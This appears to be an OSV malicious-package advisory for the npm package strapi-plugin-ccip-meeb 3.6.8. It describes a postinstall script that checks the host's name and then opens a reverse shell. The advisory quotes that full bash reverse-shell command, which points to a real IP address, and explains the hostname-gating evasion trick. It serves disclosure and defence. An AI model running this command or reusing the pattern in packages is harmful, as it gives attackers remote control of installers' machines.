MAL-2026-16226

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-ccip-meeb/MAL-2026-16226.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16226
Published
2026-09-16T13:58:20Z
Modified
2026-09-16T14:30:07Z
Summary
Malicious code in strapi-plugin-ccip-meeb (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fbf7a24da69c80ba7475efcb12c97f1be8b4ebbed42b47131ac9716ff38d5620)

strapi-plugin-ccip-meeb@3.6.8 declares scripts.postinstall = 'node postinstall.js', so postinstall.js runs automatically on npm install. The script imports child_process and checks os.hostname() against a hardcoded value ('ubuntu-fc-uvm'); when the hostname matches, it executes bash -c "bash -i >& /dev/tcp/14.225.210.85/80 0>&1", opening an interactive reverse shell from the installer's host to 14.225.210.85:80. The hostname gate causes the payload to remain dormant on unrelated hosts and fire only in the attacker's expected target environment, a targeting/sandbox-evasion pattern. The package name mimics a legitimate Strapi plugin scope but the shipped code has no plugin functionality consistent with that name; the postinstall reverse shell is the substantive behavior.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020098",
            "import_time": "2026-09-16T14:19:37.777374135Z",
            "modified_time": "2026-09-16T13:58:20Z",
            "sha256": "fbf7a24da69c80ba7475efcb12c97f1be8b4ebbed42b47131ac9716ff38d5620",
            "source": "amazon-inspector",
            "versions": [
                "3.6.8"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / strapi-plugin-ccip-meeb

Package

Name
strapi-plugin-ccip-meeb
View open source insights on deps.dev
Purl
pkg:npm/strapi-plugin-ccip-meeb

Affected ranges

Affected versions

3.*
3.6.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "59958a5b6cf205abf8e3c05e62d883c008dafcd91abe907dda3d0f2bdb95a5a2",
            "tlsh": "ef411eed05bf2b3962338ce9522b8097d52741023516d278b5dc8b43bfc4d9ac631afa"
        }
    ],
    "package_integrity": [
        {
            "filename": "strapi-plugin-ccip-meeb-3.6.8.tgz",
            "hashes": {
                "sha1": "008c35dc2a1661ec689d7fd16960b7558476b204",
                "sha512_sri": "sha512-fXMnw1swkqWeky07GJYXghKawxBe2BF+ueYz7+FEtd+g9GvknJVCPjBrO2FMmGKBdKo3wmtKsdQIt0+8i920AA=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-ccip-meeb/MAL-2026-16226.json"